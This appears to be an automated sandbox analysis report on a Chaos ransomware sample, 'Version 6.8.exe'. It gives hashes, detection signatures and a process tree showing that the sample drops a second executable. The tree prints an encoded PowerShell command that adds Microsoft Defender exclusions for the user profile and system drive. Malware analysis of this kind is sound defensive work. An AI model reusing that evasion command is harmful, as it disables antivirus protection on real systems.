Analysis
-
max time kernel
119s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
14-03-2024 19:27
Static task
static1
Behavioral task
behavioral1
Sample
Version 6.8.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Version 6.8.exe
Resource
win10v2004-20240226-en
General
-
Target
Version 6.8.exe
-
Size
1.3MB
-
MD5
5b5065f49718bd167911f12eec35a942
-
SHA1
fe005ea9e2e572c79e881e1c57a21585a9577841
-
SHA256
4265e1f20a3443c5d9401bc2a27d4014ae75c931d60dcd87124e9d01a943a66e
-
SHA512
e33adb710d12380b8cb00c2092ab43f7eb7d2488d07ddee5fba360c0858f8113a008d99780a4da6f35fccc81b3a18058a266481714c8040d57041923d35ab9bb
-
SSDEEP
24576:a67Q2xXDBqBdEa+rfhtb5VUkxD/eL+wP+wJtXJtZW6N9VgWVB:aYQ2xXDBUdGNr5xD/SPpXtWiHgmB
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Version 2.8.exe family_chaos behavioral1/memory/2644-14-0x00000000008D0000-0x000000000090E000-memory.dmp family_chaos -
Executes dropped EXE 1 IoCs
Processes:
Version 2.8.exepid process 2644 Version 2.8.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
Version 2.8.exepowershell.exepid process 2644 Version 2.8.exe 2644 Version 2.8.exe 2644 Version 2.8.exe 2552 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Version 2.8.exepowershell.exedescription pid process Token: SeDebugPrivilege 2644 Version 2.8.exe Token: SeDebugPrivilege 2552 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
Version 6.8.exeVersion 2.8.exedescription pid process target process PID 3008 wrote to memory of 2552 3008 Version 6.8.exe powershell.exe PID 3008 wrote to memory of 2552 3008 Version 6.8.exe powershell.exe PID 3008 wrote to memory of 2552 3008 Version 6.8.exe powershell.exe PID 3008 wrote to memory of 2644 3008 Version 6.8.exe Version 2.8.exe PID 3008 wrote to memory of 2644 3008 Version 6.8.exe Version 2.8.exe PID 3008 wrote to memory of 2644 3008 Version 6.8.exe Version 2.8.exe PID 2644 wrote to memory of 2448 2644 Version 2.8.exe WerFault.exe PID 2644 wrote to memory of 2448 2644 Version 2.8.exe WerFault.exe PID 2644 wrote to memory of 2448 2644 Version 2.8.exe WerFault.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Version 6.8.exe"C:\Users\Admin\AppData\Local\Temp\Version 6.8.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAcQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AeABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZABpACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2552 -
C:\Users\Admin\AppData\Roaming\Version 2.8.exe"C:\Users\Admin\AppData\Roaming\Version 2.8.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2644 -s 5683⤵PID:2448
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
223KB
MD577a0989f046d5404700debc97727ca2b
SHA1d0bdfdc67862e0bfa491d5d4a3313382a7921625
SHA25699b88ce97064536c370e630245018b15bf87c0c1113e2c4c95bfb7dc1078b647
SHA512f918e3bf1d488cb77f06ede3d565396b8a6391f372e79fd6d148e1afec311143332bd91cb6d3f05fd6b348d40bfd4ae02adc79e20c6031aaa08c1d29d5b83aa9